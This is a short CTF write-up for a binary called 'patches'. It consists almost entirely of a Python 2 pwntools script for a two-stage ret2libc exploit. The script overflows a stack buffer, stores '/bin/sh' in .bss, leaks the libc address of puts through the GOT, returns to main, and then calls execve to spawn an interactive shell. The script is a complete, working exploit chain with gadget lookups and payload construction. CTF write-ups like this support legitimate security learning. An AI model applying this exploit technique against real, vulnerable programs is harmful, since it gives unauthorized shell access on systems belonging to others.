Tags: pwn ret2libc
Rating:
Basic Ret2Libc
Note: I did not play this CTF; I just looked at the challenges after it was over.
```python
#!/usr/bin/python
# Two-stage ret2libc solve script for the "patches" binary.
# Stage 1: overflow once to call gets() into .bss (storing "/bin/sh") and
#          puts() on the GOT entry of puts, leaking its libc address, then
#          return to main for a second overflow.
# Stage 2: rebase libc from the leak and call execve() on the stored string.
# NOTE(review): this is Python 2 code — `.next()`, `print hex(...)` and the
# str-typed payloads (p64() output concatenated with a str) do not run on
# Python 3 without changes.
from pwn import *
context(os='linux',arch='amd64')
context.log_level = 'DEBUG'   # log every send/recv so the leak bytes can be inspected
context(terminal=['tmux','new-window'])
p = process('./patches')
#p = gdb.debug('./patches','b main')   # alternative: run under gdb, breaking at main
e = ELF('./patches')
libc = ELF('./libc-2.31.so')   # symbol offsets below only hold if this matches the target's libc
JUNK = "A"*136   # padding up to the saved return address — presumably the overflow distance for this binary; verify
pop_rdi = e.search(asm('pop rdi; ret')).next()   # first match of the gadget bytes in the binary (Python 2 iterator API)
pop_rsi = e.search(asm('pop rsi; pop r15; ret')).next()   # also pops r15, hence the pair of p64(0) below
gets = e.plt['gets']
plt_puts = e.plt['puts']
got_puts = e.got['puts']
bss = e.get_section_by_name('.bss')["sh_addr"] + 1200   # writable scratch slot for the "/bin/sh" string
main = e.symbols['main']
# Stage 1 chain: gets(bss) -> puts(got_puts) -> rsi = 0, r15 = 0 -> main
# Returning to main re-triggers the vulnerable read so stage 2 can be sent once libc is known.
payload = JUNK + p64(pop_rdi) + p64(bss) + p64(gets) + p64(pop_rdi) + p64(got_puts) + p64(plt_puts) + p64(pop_rsi) + p64(0) + p64(0) + p64(main)
p.recvuntil("> ")
p.sendline(payload)
p.sendline("/bin/sh\x00")   # consumed by the gets(bss) call in the chain above
leak = u64(p.recvline().strip().ljust(8,'\x00'))   # puts() emits fewer than 8 bytes for the address; pad to the 8 that u64 needs
libc.address = leak - libc.symbols['puts']   # rebase libc from the leaked puts address (assumes the GOT entry was already resolved)
print hex(libc.address)
execve = libc.symbols['execve']
# Stage 2 chain: execve(bss, 0, <rdx>) with rdi = "/bin/sh" and rsi = NULL.
# NOTE(review): rdx (envp) is not set by this chain; it is assumed to already
# hold a value execve accepts at that point — confirm.
payload = JUNK + p64(pop_rdi) + p64(bss) + p64(pop_rsi) + p64(0) + p64(0) + p64(execve)
p.recvuntil("> ")
p.sendline(payload)
p.interactive()
```